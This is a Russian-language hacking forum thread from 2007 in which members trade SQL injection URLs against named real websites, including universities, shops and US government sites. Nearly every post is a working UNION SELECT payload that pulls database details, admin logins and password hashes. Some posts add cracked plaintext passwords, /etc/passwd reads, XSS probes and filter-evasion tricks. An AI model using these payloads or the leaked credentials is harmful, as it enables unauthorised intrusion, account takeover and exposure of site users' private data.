http://asya-club.ru/board/message.php?id=-1+union+select+1,2,version(),user(),5,6, database(),8/*
version 5.0.41-log
user arigato@localhost
database asyaclu5_chateng
_http://asya-club.ru/board/message.php?id=-1+union+select+1,2,user,4,password,6,7,8+from+mysq l. user/*
root:02462cca620de2cd
_hxxp://asya-club.ru/board/message.php?id=-1+union+select+1,2,3,4,LOAD_FILE(char(47,101,116,9 9,47,112,97,115,115,119,100)),6,7,8/*
_http://asya-club.ru/board/message.php?id=-1+union+select+1,2,3,4,pwd,6,login,8+from+administ rators/*
InterComp - Все о компьютерах и для вашего компьютера (hardware, software)
http://intercomp.net.ru/dll/file.php?id=-1+union+select+1,2,concat(username,0x3a,user_passw ord ,0x3a,user_email,0x3a,user_icq),4+from+phpbb_users +limit+1,1/*
вывод под фразой "Описание DLL"...
http://www.inso.edu.ru/seminars/info.phtml?id=-1+union+select+1,2,3,4,USER(),VERSION(),7,8,DATABA SE( ),10,11,12,13,14,15,16,17,18,19,20/*
user mlogos@pm15.zenon.net
version 4.0.27-log
database mlogos
пройдемся по Румынии:
_htp://ori.utcluj.ro/burse/detalii_bursa.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18/*
подбираем столбец и таблицу:
http://ori.utcluj.ro/burse/detalii_bursa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat(column_name,0x3a,table_name),16,17,18+from+IN FORMATION_SCHEMA.COLUMNS+limit+160,1/*
выводим логин:пароль админа:
_http://ori.utcluj.ro/burse/detalii_ bursa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat(username,0x3a,password),16,17,18+from+adabsol utum_admin/*
АРТЕК :)
в детстве очень мечтал туда попасть...
код:
http://www.artek.org/index.phtml?ID=-101101+union+select+1,2,3,4,5,6,7,concat(uname,cha r(58),sname,char(58),nick,char(58),email,char(58), password),9,10,11,12,13,14+from+artekovtsi+limit+7 ,1/*
Ded MustD!e
09.09.2007, 18:44
https://maps.tva.com/scripts/store/cart.asp?ID=1+or+1=(SELECT+TOP+1+Username+FROM+Log in)--
колонка с паролями - Password
popmech.ru
4.0.26:popmech:popmech@www.popmech.ru
http://www.popmech.ru/part/?articleid=2195+UNION+SELECT+concat(name,char(58), password)+from+users+--+&rubricid=4
f1rebl00d
10.09.2007, 16:36
http://www.generationrice.com/index.phtml?talk=carlnomura_-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
Биржа РаботЪ код: http://www.rubler.ru/users/user.phtml?id=-20+union+select+1,2,3,4,concat(login,char(58),emai l,char(58),password),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23+from+rf+limit+3691,1/* в бд 3691 юзер,пароли в открытом виде :wink:
http://buy-sell.in/fullnews.php?id=-1+union+select+1,email,3,4,password+from+members+l imit+31,1/*
мускул 4, вход по имэйл, юзеров 31 =\
http://www.realkerala.in/detail.php?id=999+union+select+1,2,3,4,5,6,7,8,9,1 0,11,concat(column_name,0x3a,table_name,0x3a),13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41+from+INFORMATION_ SCHEMA.COLUMNS+limit+1,1/*/*
PR 4
красивый сайт
http://www.femina.in/viewpost.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x71 ),0x71),3, 4,5,6,7,8,9,10,11,12,13,14,15/*
а форум еще лучше =)
http://www.femina.in/viewpost.php?id=-1+union+select+1,concat(username,0x3a,user_passwor d,0x3a,user_email,0x3a, user_icq),3,4,5,6,7,8,9,10,11,12,13,14,15+ from+phpbb_users+limit+1,1/*
http://www.vedanta.edu.in/page.php?id=-2+union+select+ 1,2,concat( user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9 ,10,11,12,13,14/*
табличка и колонка:
htp://www.vedanta.edu.in/page.php?id=-2+union+select+1,2,3,4,5,6,concat(column_name,0x3a ,table_ name, 0 x3a),8,9,10,11,12,13,14+from+ INFORMATION_SCHEMA.COLUMNS+ lim it+160,1/*
а вот сами логин + хэш =)
http://www.vedanta.edu.in /page.php?id=-2+union+ select+1,2,username,4,5,6,password,8, 9,10,11,12,13,14+from+ admin/*
везде 4 мускл...
_htp://dostoevskij .karelia.ru/showarticle.phtml?id=-1 +union+select+1,concat(user(), 0x3a,version( ),0x3a,database() )/*
_htp://www.passi.eu/profil.php?id= -1+union+s elect+1,2,3,4,5,6,7,8,9,10,11,12,concat(user (),0x3a ,version(),0x3a,database() ),14,15,16,17,18/*
_htp://www.aktivungdom.eu/art/?id=9999+union+ select+1,2,3,concat(user(),0x3a,version( ),0x3a,database() ),5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27/*
_http://www .bsn.eu/main.php?id=-1+union+select+1,2,3,aes_decrypt (aes_encrypt(version(),0x 71),0x 71),5,6,7,8,9/*
http://www.ghost-bikes.com/2008/typ.php?bid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33/*
вывод в пути к картинке
http://www.rosregistr.ru/index.php?menu=3010050000&id_part=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21
инжекты во всех параметрах =\
.EDU
красивая скуля, код:
http://webmaster.upi.edu/~ghmahendra/wap/newsdetail.php?id=-21+union+select+1,2,CAST(concat(column_name,char(5 8),table_name)+AS+BINARY),4+from+information_schem a.columns/*
нашел только это, код:
http://webmaster.upi.edu/~ghmahendra/wap/newsdetail.php?id=-21+union+select+1,2,concat(username,password),4+fr om+admina/* кто доработает?
Red_Red1
12.09.2007, 14:49
https://ssl.paycash.ua/cgi-bin/error.cgi?code=-300%20union%20select%20'Это%20в<script>alert("XSS")</script>ывод'
Нашел вот такую скулю (впервые в cgi скрипте). Единственное что придумал это ХСС. Извесны таблицы errors и partners. Больше вытянуть ничего не удалось. А может и нету тут нифига. Кто найдет, расскажите ;)
А такие скули стоит выкладывать?
код:
http://wap.sarbc.ru/news/shownews.phtml?id=-71891+union+select+1,2,3,4,concat(char(58),char(58 ),char(58),char(58),char(58),name,char(58),passwd) ,6,7,8,9,10,11,12+from+user+limit+1,1/*
p.s At me today birthday :)
http://www.kraak.net/en/releases.php?ID=-31+union+select+1,2,3,4,concat(username,0x3a,userp assword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22+from+user/*
aka PSIH
13.09.2007, 18:08
eitc.edu
http://www.eitc.edu/display_news_release.cfm?&rel_id=-1%20union%20select%201,2,3,concat(user(),0x7c,vers ion(),0x7c,database()),5,6,7,8,9,10,11,12,13,14,15/*
eitc@localhost|4.1.20|eitc
MTS украина (вап)
http://wap.buffer.mts.com.ua/ custom_cards/mtswap/show.php? type=xh tml&lang=ru&id=-14470+union+select+1,2,concat(version(),0x3a,user( ),0x3a,database( )),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
инет-магазин
код:
http://www.alo-alo.ru/news.phtml?t=3&idn=-23+union+select+1,concat(column_name,char(58),tabl e_name),3,4+from+information_schema.columns/*
delay(0)
13.09.2007, 21:47
http://www.ukrnic.com/hosting_info.php?id=3+union+select+1,2,version()/*
http://carrots-art.com/ru/pages/content/index.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10/*
http://steephost.com/view.php?id=2+union+select+1,version()/*
3 хостинга, 4 версия :'(
lsass.exe
13.09.2007, 22:31
http://radiorecord.ru/news/?id=-1+union+select+1,database(),3,version()/*
http://tikhvin.spb.ru/view.php?bn=a_articles&key=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,userid,17,password,19,20,21,22,23,24,25,26,27,28, 29,30,31,32+from+a_users/*&for=
WAP.MOBILNIK.UA
код:
http://wap.mobilnik.ua/news.php?act=full&id=-12168%27+union+select+1,concat(pass,char(58),email ,char(58),name),3,4,5,6,7,8,9,10+from+sub_user+lim it+46,1/*
please,help! как раскрутить такую скулю?
код:
http://www.copris.com/pinboard/cgi-bin/nameanon_r.idc?Canonce=1'
http://www.alalbany.ws/search/view.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5/* albws_albws@localhost:4.1.22-standard:albws_albwsch
http://www.eitan.ws/publicaciones/ver_publicaciones.php?id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,vers ion(),0x3a,database())/* eitan@192.168.0.120:5.0.22-max:eitan
lsass.exe
14.09.2007, 19:38
http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,email,6,password ,password,9,10,login,12+from+users+limit+2,6/*
Также написал парсер и вытянул всю базу
http://lsass.us/uptime.ru.txt
Интернет магазин цифровой техники =\
htp://cyfra. com.ua/options?id= 9999+union+se lect+1,concat(user(),0x3a,version(),0x3a,database( ))/*cyfra@localhost:5.0.24a-Debian_9-log:cyfra
http://www.teachandtic.es/webquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,p assword,0x3a,e_mail)%20from%20usuario
http://www.rosanemello.pro.br/webquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,p assword,0x3a,e_mail)%20from%20usuario
http://www.inovar.pt/cre/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,p assword,0x3a,e_mail)%20from%20usuario
http://www.cfpa.pt/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,p assword,0x3a,e_mail)%20from%20usuario
http://www.maiaexperimental.net/webquests/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,p assword,0x3a,e_mail)%20from%20usuario
http://www.manuelfariasousa.pt/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,p assword,0x3a,e_mail)%20from%20usuario
http://www.projectos.esffl.pt/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,p assword,0x3a,e_mail)%20from%20usuario
http://www.ebivc.org/webquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,p assword,0x3a,e_mail)%20from%20usuario
http://www.api.adm.br/phpwebquest_2_international/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,p assword,0x3a,e_mail)%20from%20usuario
http://www.capag.info/wq/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,p assword,0x3a,e_mail)%20from%20usuario
http://www.cf-terras-feira.org/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,p assword,0x3a,e_mail)%20from%20usuario
_http://www.vanta.ru/script/catalog.php?cat=-1%20union%20select%201,USER()/*
AdReNa1!Ne
15.09.2007, 14:39
POST http://smspaymer.com:80/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: smspaymer.com
Content-Length: 121
Cookie: reg_num=160517
Connection: Close
Pragma: no-cache
step=1&my_country=[sql_inj]&my_wmr=111@mail.com&my_phone=79260001144&nextstep=%CF%F0%EE%E4%EE%EB%E6%E8%F2%FC
Инъекция через POST запрос
http://www.whathaseuropedone.org.uk/topic_detail.php?topic_id=-13+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12 +from+partners/*
http://hyipcredit.com/forum/topic_detail.php?id=-2%20UNION%20SELECT%201,2,3,admin_password,5,userna me,7,8%20From%20admin/*
http://www.monetary-code.com/forum/topic_detail.php?id=-92%20UNION%20SELECT%201,2,3,admin_password,5,usern ame,7,8%20From%20admin/*
http://www.afsnetworks.com/news.php?id=-70+union+select+1,2,concat(id,0x3a,username,0x3a,p asswd),4,5,6,7,8,9,10,11,12+from+users/*
http://kinosbornik.ru/search.php?sort=zhanr&zhanrid=1'
http://kinosbornik.ru/search.php?sort=zhanr&zhanrid=1'
http://kinosbornik.ru/search.php?sort=zhanr&zhanrid=-1+union+select+table_name+from+INFORMATION_SCHEMA. TABLES/*
http://www.gnarlsbarkley.com/cms/news/news_view_comments_list.php?id=38+limit+0+union+se lect+1,777,1,1,1,1/*
http://www.casino-games-internet.com/it/guida.php?ID=527+limit+0+union+select+1,1,version( ),1222,1444,1,1,1,1,1,1/*
http://www.basketball.ru/netcat/modules/user/profile.php?userid=-1+union+select+1,2,3,,5,Version(),7,8/*
http://cidoc.ics.forth.gr/issues.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,10/*
http://www.toumaz.com/news/news.php?id=26+limit+0+union+select+1,1,2,2,3,user ()/*
http://www.tmf.ukim.edu.mk/subview2.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(VERSION (),0x71),0x71),4/*
http://www.tmf.ukim.edu.mk/mjcce/default.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(USER(), 0x71),0x71),AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71 ),0x71),5,6,7,8,9,10,11,12,13,14/*&start=0 http://shqip-toplevel.schools.edu.mk/dynamicpage.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x 71),0x71),3,4,5,6,7,8,9,AES_DECRYPT(AES_ENCRYPT(VE RSION(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(DATABA SE(),0x71),0x71),12,13/*
http://mebelsm.ru/index.php?sect=cat&catid=64&prod_id=-1+union+select+1,2,3,4,5,user(),7,8,9/*
Там есть еще, но ковыряться не было времени
http://www.btb.cc/adetail.php?id=-881+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C6 2723E,VERSION(),DATABASE(),USER()),11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25
http://www.energyagency.org.uk/news.php?id=-1+union+select+0,1,2,3,4,5/*
http://www.impact.org/news.php?id=-1+union+select+0,1,2,3,user(),5,version(),7
http://www.microchip.by/info.php?id=99999+union+select+1,2,3,USER(),VERSIO N()/*
код:
http://well.com.ru/abc/article.phtml?id=-30+union+select+1,concat(email,char(58),username,c har(58),password),3,4,5,6+from+users+limit+2969,1/*
asm@well.com.ru:andyman:4fb43774fffcebaa081b11f50f 239245
код:
http://avd.org.ua/viewdetails.php?id=-915+union+select+1,concat_ws(0x3C62723E,username,p asswd,email),3,4,5,6,7,8,9,10,11,12,13,14+from+use r+limit+50,1/*
админка там-же, avdinform:123slayer
код:
http://scene.org.ru/forum.php?m_page=48&topic_id=-355+union+select+1,2,concat_ws(0x3C62723E,name,pwd ,email),4+from+users+limit+2513,1/*
kama:
8beb1e67f180511e9ba1b1c8dd7338c6:
kama@scene.org.ru
http://whl.ca/records/awards.php?id=65+limit+0+union+select+1,2,3,versio n(),5,1,2,3/*
[53x]Shadow
17.09.2007, 23:44
http://whl.ca/records/awards.php?id=65+limit+0+union+select+1,2,3,versio n(),5,1,2,3/*
Зачем такой изврат с лимитом, можна просто
http://whl.ca/records/awards.php?id=-1+union+select+1,2,3,versio n(),5,1,2,3/*
Heavy Metal
18.09.2007, 00:48
lovas.ru
http://lovas.ru/photo/?id=1660&fid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,id,login,p assword)+from+lovas.kefir_users+where+id=1/*
девушки )
http://lovas.ru/photo/?id=1660&fid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,id,login,p assword,icq,site,mail,phone)+from+lovas.kefir_user s+where+gender=2+limit+350,200/*
delay(0)
18.09.2007, 08:17
VLG- Veterinary Leadership Group
http://www.vlg.us/users_info.php?user=-1+union+select+1,2,3,4,5,6,7,8,concat(adm_username ,0x3a,adm_password),1,2,3,4,5,6,7,8,9,1,2,3,4,5,6, 7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4, 5+from+cms_admin+limit+0,1/*
csos:2d7784bc6d2ee4d098ba1a941b8aeff6
jackrife:8c7516e35cc1316c549d2e0a6be7c3f4
http://www.vlg.us/login.php
Calcutta
18.09.2007, 10:19
Продолжим список уязвимых сайтов наших отечественных групп:
http://www.piknik.info/ALBUMS/cd.php?id=-3+union+select+1,concat_ws(char(58),version(),data base(),user()),3,4,5,6,7/*
4.0.27-max-log : piknik_omsa : piknik_omsa@v18.valueho
Heavy Metal
18.09.2007, 11:18
http://www.ndt.net - PR 7
http://www.ndt.net/search/pdf2html.php?&url=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,id,login, password,name,eMail,encrypted)+from+System+limit+4 ,630/*
http://www.ndt.net/search/pdf2html.php?&url=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,id,userna me,passwort,author,eMail,WorkAs)+from+Profile+wher e+id=1/*+limit+1034,0/*
http://www.rgups.ru - РГУПС
http://www.ui.rgups.ru/full_new.php?id=-1+union+select+concat_ws(0x3a,login,pass),1,2+from +st_users+where+login=char(97,100,109,105,110)
_http://www.tebol.com.br/cidade/home.php?id=-1+union+select+1,user(),version(),database(),5,6,7 ,8,9,10,11/*
До полей не докопался... Очень нужны данные! Подскажите...
Heavy Metal
18.09.2007, 12:21
fRg,
http://www.tebol.com.br/cidade/home.php?id=-1+union+select+1,2,concat_ws(0x3a,table_name,colum n_name),database(),5,6,7%20,8,9,10,11+from+informa tion_schema.columns+limit+775,1/*
http://www.tebol.com.br/cidade/home.php?id=-1+union+select+1,2,concat_ws(0x3a,table_name,colum n_name),database(),5,6,7%20,8,9,10,11+from+informa tion_schema.columns+where+column_name=0x7061737377 6F7264/*limit+775,1/*
Calcutta
18.09.2007, 13:55
http://www.otpetyemoshenniki.ru/?sid=-1+union+select+1,concat_ws(0x3a,database(),user(), version()),3,4,5,6,7,8,9+from+information_schema.c olumns/*
чего то без прямого вывода...
Heavy Metal
18.09.2007, 14:14
Calcutta, http://www.otpetyemoshenniki.ru/?sid=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,data base(),user(),version())+from+information_schema.c olumns/*
открываешь в html и делаешь поиск по "5.0.45-log"
http://www.kayakextrem.ru/olist.php?id_=-86+union+select+1,2,concat_ws(0x3C62723E,VERSION() ,DATABASE(),USER()),4,5,6,7
http://www.obluvd.tsu.ru/inform.php?page=informfull&id_=-4+union+select+1,concat_ws(0x3C62723E,VERSION(),DA TABASE(),USER())
http://www.trubka.ru/cellular/phone.php?id=-33+union+select+1,2,concat(login,char(58),password ),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33+from+admin
=\
Termin@L
18.09.2007, 23:52
http://www.gs-agency.com/book_show_en.php?id=-1+union+select+1,2,3,4,5,6+from+table/*
плииз помогите подобрать таблицу админки
да и немного экзотикиЮ никто не может сказать что это за кодировка?
http://instyle-models.com/image.php?id=-1%20union%20select%20table_name,2222222+from+infor mation_schema.tables/*
Штирлиц и тотал декодер сдались без боя
BlackCats
19.09.2007, 14:41
users
http://sydneyclubs.info/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10, 11,12,13,14/**/FROM/**/users/*
users
http://www.pubsmontreal.com/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10, 11,12,13,14/**/FROM/**/users/*
aka PSIH
19.09.2007, 14:47
www.sei.aero
http://www.sei.aero/ptpl.index.php?PageT=ReadNews&act=&ID=-1%20union%20select%201,2,3,4,5,concat(user(),0x3a, version(),0x3a,database()),7/*
spacewor_jason@localhost:4.1.22-standard-log:spacewor_spaceworks
[53x]Shadow
19.09.2007, 20:06
www5.hud.gov
http://www5.hud.gov/urban/perms/printReport.asp?report=-1))+or+1=@@version--
http://www5.hud.gov/urban/perms/printReport.asp?report=-1))+or+1=(select+user)--
http://www.webmarket.mobi/wm.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6/*
webmarke_uwebmar@localhost:5.0.41-community-log:webmarke_webmarket
http://www.webmarket.mobi/wm.php?id=-1+union+select+1,2,concat(column_name,0x3a,table_n ame,0x3a),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+li mit+16001/*
Heavy Metal
19.09.2007, 21:42
http://seagullmag.com/article.php?id=-1+union+select+1,0x6865617679206D6574616C21,concat _ws(0x3a,name,password),4,5,6,7,8,9,10,11+from+sea gullmag_forum.ibf_members+limit+1,1
http://job.dn.ua/classifieds/detail.php?id=382&user_id=-1+union+select+version()&contact=1
http://job.dn.ua/classifieds/user_info.php?user_id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32
http://www.myminsk.com/catalog/info.php?id=-1+union+select+1,2,concat_ws(0x3a,table_schema,tab le_name),4,5,6,7,8,9,10,11,12,13,14+from+informati on_schema.tables
[53x]Shadow
20.09.2007, 00:17
maps2.nris.mt.gov
http://maps2.nris.mt.gov/Mapper/MapWindow.asp?Profile=-1+or+1=@@version--
http://maps2.nris.mt.gov/Mapper/MapWindow.asp?Profile=-1+or+1=(select+system_user)--
http://anime.kz/index.html
http://anime.kz/index.html?mode=links&pid=6+UNION+SELECT+1,2,3,4,5,6,7/*
http://anime.kz/index.html?mode=links&pid=4+union+select+1,table_name,3,4,5,6,7+from+INF ORMATION_SCHEMA.TABLES/*
http://anime.kz/index.html?mode=links&pid=6+UNION+SELECT+1,concat(login,char(58),pwd),3, 4,5,6,7+from+user+limit+1,8/*
groundhog
20.09.2007, 15:14
www.rusbiz.ru
Ресурс представляет из себя многоотраслевой портал с электронной торговой площадкой. Основной целью портала является содействие компаниям малого и среднего бизнеса в расширении сфер своей деятельности, увеличении объемов продаж, нахождении новых деловых связей за рубежом и проведении бизнес сделок через Интернет. Всё бы хорошо, но... Банальный SQL-Injection в параметре servid.
Получаем список таблиц:
http://www.rusbiz.ru/service_description.html?servid=-66'/**/UNION/**/SELECT/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21/**/FROM/**/INFORMATION_SCHEMA.TABLES/**/LIMIT/**/X,1/*&categid=19
Получаем список полей в заданной таблице:
http://www.rusbiz.ru/service_description.html?servid=-66'/**/UNION/**/SELECT/**/1,TABLE_NAME,3,COLUMN_NAME,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME/**/IN/**/('XXX')/**/LIMIT/**/X,1/*&categid=19
* Обратите внимание на использование /**/ вместо стандартных вариантов представления пробела... Это вызвано тем, что фходной параметр фильтруется (хоть и криво). Фильтрация делает невозможным использование %20 или + в качестве пробела, также фильтруется =, поэтому пришлось воспользоваться операцией IN.
Из интересных таблиц имеем USER и forum_user, но форум по техническим причинам отключён, поэтому дело будем иметь только с первой таблицей. Таблица имеет такую структуру:
password - пароль аккаунта в md5
user_group - группа аккаунта (может быть user, admin и т.д.)
blocked - активированный аккаунт или нет
lastlogin - время последнего посещения
Начнём вторжение в святая святых:
http://www.rusbiz.ru/service_description.html?servid=-66'/**/UNION/**/SELECT/**/1,CONCAT_WS(0x3a,login,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21/**/FROM/**/USER/**/WHERE/**/user_group/**/LIKE/**/'%admin%'/**/LIMIT/**/X,1/*&categid=19
По данному запросу возвращается две записи pol и systemuser. Это два админских аккаунта.
Пароли свёрнуты в md5:
pol:890a09778691261d1e1e7c65f6101d3c
systemuser:972c97bdc47dfc8def0e74c55da0bbfd
В помощь Джон и через пару секунд:
pol:51619
systemuser:explore
Ну чтож... Админы никогда не научатся проявлять фантазию при задании паролей от критических ресурсов... Должен заметить, что половина базы снимается одним проходом по словарю и прямым брутом по 0...9 в длине 8 символов.
Не знаю как быстро прикроют эту багу, ибо такое впечатление, что там админ в онлайне... Но в доказательство приведу ещё один аккаунт:
green:1604
http://www.yesmag.ca/bugbeat/bugs.php?id=-8+union+select+1,2,3,4,5,VERSION(),USER()/*
Dracula4ever
20.09.2007, 15:30
http://www.lada-auto.ru/cgi-bin/news.pl?id=-1'
halkfild
20.09.2007, 17:00
cs.xeka.ru
движек - psyhostats
вот скули.. нашел почти сразу но были проблемы с выводом.. потом пошаманил с лимит 0 помогло [:
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19/*'
http://cs.xeka.ru/mafia/map.php?id=2+limit+0+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17/*'
тут еще много ксс, но пару лишь, нашел пока скули искал :)
http://cs.xeka.ru/mafia/player.php?id=19%22%3E%3Cscript%3Ealert()%3C/script%3E
http://cs.xeka.ru/mafia/player.php?id=19\%22%3E%3Cscript%3Ealert()%3C/script%3E&weaponid=10&wsort=kills&worder=desc#hitbox
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,TABLE_SCHEMA,TABL E_NAME,COLUMN_NAME),15,16,17,18,19+from+informatio n_schema.columns/*'
много столбцов)
вывод всякой инфи
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,version(),databas e(),user()),15,16,17,18,19/*'
5.0.45-community-nt-log:ps_mafia:root@localhost
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,username,password ,nickname),15,16,17,18,19+from+amx.amx_amxadmins/*'
1 STEAM_0:1:пароли сказали потереть::belo4ka 1 2% 3 12.00
2 АЙ-ПИ::LeXXXuS 1 2% 3 12.00
3 АЙ-ПИ::Admir@L 1 2% 3 12.00
4 АЙ-ПИ::belo4ka 1 2% 3 12.00
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,username,password ,level),15,16,17,18,19+from+amx.amx_webadmins/*'
belo4ka:пароли сказали потереть:1
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,username,password ,accesslevel),15,16,17,18,19+from+ps_mafia.pstats_ plr_profile/*'
1 :пароли сказали потереть:1 1 2% 3 12.00
2 :пароли сказали потереть:10 1 2% 3 12.00
з.ы. вывод понравился так как там была таблица не надо было тянуть по одной))
з.з.ы движек сегодня увидел первый раз.. мо там есть еще что-то поинтереснее но рыть особо не стал [:
з.з.ы ися был осведомлен)
з.з.ы потер пароли и мыла
groundhog
21.09.2007, 13:58
vodnyy.odessa.ua
http://vodnyy.odessa.ua/lists/company.phtml?site=vo&sample_id=-1874+UNION+SELECT+T.L,T.P,'cracked by groundhog',4+FROM+(SELECT+ROWNUM+R,LOGIN+L,PASSWD+ P+FROM+CO_USERS)+T+WHERE+R=X+--+
phol1eadeux
21.09.2007, 20:33
http://www.vkus.by/index.php?n=-1+union+select+1,2,3,4,5,6/*
MySQL : 4 версия
BlackCats
22.09.2007, 03:38
"раскрутил" скулю Slider'a "попроще"
сразу говорю сорри, когда раскручивал не видел что слайдер сам уже раскрутил..
http://anime.kz/index.html?mode=links&pid=6+UNION+SELECT+1,login,3,4,pwd,6,7+from+user/*
+ своя:
http://www.borytucholskie.pl/index.php?id=-1+union+select+1,password+from+users/*
пароль, логин - ненашёл :(
http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHE MA.COLUMnS+WHERE+TABLE_NAME=users+limit+0,1/*
http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHE MA.COLUMnS+WHERE+TABLE_NAME='users'+limit+0,1/*
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /index.php on line 10
:(
2BlackCats
http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHE MA.COLUMnS+WHERE+TABLE_NAME=CHAR(117,115,101,114,1 15)+limit+1,1/*
кавычки фильтруются ;)
Scipio, хм, я не пойму как вы из этого извлекаете логин и пароль? У меня вот появилось в середине страницы:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /index.php on line 10
А как из этого пользу извлечь не пойму( объясни плз.
Heavy Metal
22.09.2007, 11:05
http://theboard.byu.edu/
http://theboard.byu.edu/index.php?area=viewall&id=-1+union+select+version(),user(),concat_ws(0x3a,use rname,user_password),4,database(),6,7,8,0x68656176 79206D6574616C203A44,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24+from+100Hrbb_users+limit+1,1
http://theboard.byu.edu/index.php?area=viewall&id=-1+union+select+1,2,load_file(0x2F6574632F706173737 764),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24+from+information_schema.tables
http://primes.utm.edu
http://primes.utm.edu/bios/page.php?id=&username=sdf%27+union+select+concat_ws(0x203a20,us ername,pass),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,2,2,2,2,2,2,2,2,2,2,2,2,2,2+FROM+person+l imit+1,1/*
http://hitl.washington.edu (Postgre 8 без прав, лениво ковырять)
